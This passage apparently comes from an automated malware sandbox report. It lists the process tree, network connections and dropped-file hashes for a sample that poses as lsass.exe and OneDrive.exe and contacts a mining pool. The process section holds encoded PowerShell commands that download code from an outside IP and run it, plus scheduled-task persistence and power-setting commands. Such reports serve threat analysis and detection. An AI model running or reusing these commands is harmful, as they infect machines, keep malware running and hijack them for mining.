PID 4744 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 4744 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 4744 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 4744 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 4744 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 4744 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 4744 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 4744 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4640 wrote to memory of 444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4640 wrote to memory of 444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe

"C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 07:16 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD7D.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

Network

Country  Destination            Domain                        Proto
RU       62.204.41.23:80        62.204.41.23                  tcp
RU       62.204.41.23:80        62.204.41.23                  tcp
RU       62.204.41.23:80        62.204.41.23                  tcp
US       8.8.8.8:53             149.220.183.52.in-addr.arpa   udp
US       8.8.8.8:53             23.41.204.62.in-addr.arpa     udp
US       8.8.8.8:53             1.208.79.178.in-addr.arpa     udp
US       8.8.8.8:53             ipinfo.io                     udp
US       34.117.59.81:80        ipinfo.io                     tcp
US       8.8.8.8:53             22.160.190.20.in-addr.arpa    udp
US       8.8.8.8:53             81.59.117.34.in-addr.arpa     udp
US       8.8.8.8:53             95.221.229.192.in-addr.arpa   udp
N/A      185.161.248.16:26885   -                             tcp
US       8.8.8.8:53             16.248.161.185.in-addr.arpa   udp
US       8.8.8.8:53             97.17.167.52.in-addr.arpa     udp
RU       62.204.41.23:80        -                             tcp
US       8.8.8.8:53             maper.info                    udp
DE       148.251.234.93:443     maper.info                    tcp
US       8.8.8.8:53             pool.hashvault.pro            udp
US       142.202.242.45:80      pool.hashvault.pro            tcp
US       8.8.8.8:53             93.234.251.148.in-addr.arpa   udp
US       8.8.8.8:53             45.242.202.142.in-addr.arpa   udp
US       52.152.110.14:443      -                             tcp
IE       20.50.73.9:443         -                             tcp
US       52.152.110.14:443      -                             tcp
US       8.8.8.8:53             203.151.224.20.in-addr.arpa   udp
RU       62.204.41.23:80        62.204.41.23                  tcp
US       8.248.3.254:80         -                             tcp
US       8.248.3.254:80         -                             tcp
US       52.152.110.14:443      -                             tcp
US       52.152.110.14:443      -                             tcp
NL       173.223.113.164:443    -                             tcp
NL       173.223.113.131:80     -                             tcp
US       204.79.197.203:80      -                             tcp
US       52.152.110.14:443      -                             tcp
US       52.152.110.14:443      -                             tcp

(A dash in the Domain column marks a connection for which the report recorded no domain.)

Files

memory/3100-133-0x0000000000860000-0x0000000000878000-memory.dmp

memory/4656-135-0x000001FA1E100000-0x000001FA1E122000-memory.dmp

memory/4656-136-0x000001FA1BF10000-0x000001FA1BF20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k4hwzdpn.kxm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4656-137-0x000001FA1BF10000-0x000001FA1BF20000-memory.dmp

memory/4776-143-0x0000029C59970000-0x0000029C59980000-memory.dmp

memory/4228-159-0x0000017CED9F0000-0x0000017CEDA00000-memory.dmp

memory/3096-168-0x000001CD9C460000-0x000001CD9C470000-memory.dmp

memory/4776-153-0x0000029C59970000-0x0000029C59980000-memory.dmp

memory/3096-180-0x000001CD9C460000-0x000001CD9C470000-memory.dmp

memory/4776-181-0x0000029C59970000-0x0000029C59980000-memory.dmp

memory/4228-182-0x0000017CED9F0000-0x0000017CEDA00000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 026d93a446c50e4ae9aa47a15d0e923f
SHA1 f8832c1a57c63bc1b085b10f39b69254e27b2fb8
SHA256 c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089
SHA512 009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181

memory/3476-183-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/3476-187-0x00000000052D0000-0x0000000005336000-memory.dmp

memory/3476-188-0x00000000053E0000-0x000000000547C000-memory.dmp

memory/3476-189-0x0000000005340000-0x00000000053A6000-memory.dmp

memory/2032-190-0x0000000000400000-0x0000000000430000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 026d93a446c50e4ae9aa47a15d0e923f
SHA1 f8832c1a57c63bc1b085b10f39b69254e27b2fb8
SHA256 c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089
SHA512 009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181

memory/2032-193-0x000000000AB40000-0x000000000B158000-memory.dmp

memory/2032-194-0x000000000A6A0000-0x000000000A7AA000-memory.dmp

memory/2032-195-0x000000000A5D0000-0x000000000A5E2000-memory.dmp

memory/2032-196-0x000000000A630000-0x000000000A66C000-memory.dmp

memory/2032-197-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/3096-199-0x000001CD9C460000-0x000001CD9C470000-memory.dmp

memory/3096-201-0x000001CD9C460000-0x000001CD9C470000-memory.dmp

memory/2032-203-0x000000000A940000-0x000000000A9B6000-memory.dmp

memory/2032-204-0x000000000AA60000-0x000000000AAF2000-memory.dmp

memory/2032-205-0x000000000B710000-0x000000000BCB4000-memory.dmp

memory/2032-206-0x000000000B300000-0x000000000B350000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/2032-213-0x0000000005190000-0x00000000051A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

memory/3060-221-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2032-222-0x000000000BF90000-0x000000000C152000-memory.dmp

memory/2032-223-0x000000000C690000-0x000000000CBBC000-memory.dmp

memory/3060-225-0x00000000048E0000-0x00000000048E1000-memory.dmp

memory/3060-224-0x0000000004900000-0x0000000004901000-memory.dmp

memory/3060-226-0x00000000048F0000-0x00000000048F1000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1960-229-0x00007FF7E3BB0000-0x00007FF7E457A000-memory.dmp

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/4744-240-0x0000000000B60000-0x0000000000F80000-memory.dmp

memory/4744-243-0x0000000000B60000-0x0000000000F80000-memory.dmp

memory/4744-244-0x0000000000B60000-0x0000000000F80000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 59cf934cb9423ae365303b9b254219d2
SHA1 e67ada1d9c39fa2ce039f87afcf2107e0fc36aaa
SHA256 a0bb67b3d402445845eabf82e660aaf63dee4becf899d727eaedd6c4ab9a8004
SHA512 122e66c756f48622ca7ea3fc657f36731fbfc59d5e92ad1702ec26f4d30f426492e9b6caaaea3249b56e70a48ecc8b25d6c127cc176f25de25df4cb700ba6692

memory/3036-255-0x000002E3784A0000-0x000002E3784B0000-memory.dmp

memory/3036-256-0x000002E3784A0000-0x000002E3784B0000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/340-263-0x0000013338230000-0x0000013338250000-memory.dmp

memory/3084-262-0x00007FF750EC0000-0x00007FF75188A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f8d061cb5bbb2559aaf515aec28227a0
SHA1 24251cc79b5c4f61c8154be0a18c5127713c796f
SHA256 ce7532548c92e3d3da457e2e8fa83ad4077a52af322c2b8635ca19cbbdc38269
SHA512 a02b2b0f43fef99513543d3be68c2fcad0dd6e66aa6c63e58f9874a51c27f58cdac79c4d9059a92d6a3e5b5235c9ad294abd2716109335f917e7df092980bf8f

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/4744-280-0x0000000000B60000-0x0000000000F80000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lsass.exe.log

MD5 24cfd42a8de70b38ed70e1f8cf4eda1c
SHA1 e447168fd38da9175084b36a06c3e9bbde99064c
SHA256 93b740416114e346878801c73e8a8670ff1390d3fa009424b88fafe614a3c5cd
SHA512 5c2daf5328ba99d750e9d0362e84f3a79b7fc8395aa8aa2bc1a01b266583fe1f8352bf0619f985aa72223412d14afa054537739b4941610a1d0f96e7fee2a875

memory/1940-282-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/1940-283-0x0000000000AF0000-0x0000000000F10000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpD7D.tmp.bat

MD5 40dfffb163bd48b6044002ca2f43b6b4
SHA1 c7c3860192be125ff057640b71572e0832f5e585
SHA256 cca43c5207cbc92221e4870432c65e9ba22892cf3760e66c3ba34efbca035a6c
SHA512 aeaaff7c8bcea0925a946e51f19584313582f3cf41497c5cc3c258be791014120fcaff645ce24e32c89a1853c28efe112e59617e7fb2be3c6eda3863835305ce

memory/3060-285-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-286-0x0000013339C10000-0x0000013339C50000-memory.dmp

memory/1940-287-0x0000000006CD0000-0x0000000006CDA000-memory.dmp

memory/2060-288-0x00007FF625430000-0x00007FF625459000-memory.dmp

memory/340-289-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-290-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/1940-292-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-291-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2060-293-0x00007FF625430000-0x00007FF625459000-memory.dmp

memory/340-294-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-295-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-296-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-298-0x0000013339C50000-0x0000013339C70000-memory.dmp

memory/340-299-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-300-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-301-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-303-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/340-304-0x0000013339C50000-0x0000013339C70000-memory.dmp

memory/1940-305-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-306-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-308-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-309-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-310-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-312-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-313-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-314-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-316-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-317-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-318-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-320-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-321-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-322-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-324-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-325-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-326-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-328-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-329-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-330-0x0000000000400000-0x000000000083B000-memory.dmp

memory/340-332-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-333-0x0000000000AF0000-0x0000000000F10000-memory.dmp

memory/3060-334-0x0000000000400000-0x000000000083B000-memory.dmp

memory/3060-335-0x0000000004910000-0x0000000004911000-memory.dmp

memory/340-337-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp

memory/1940-338-0x0000000000AF0000-0x0000000000F10000-memory.dmp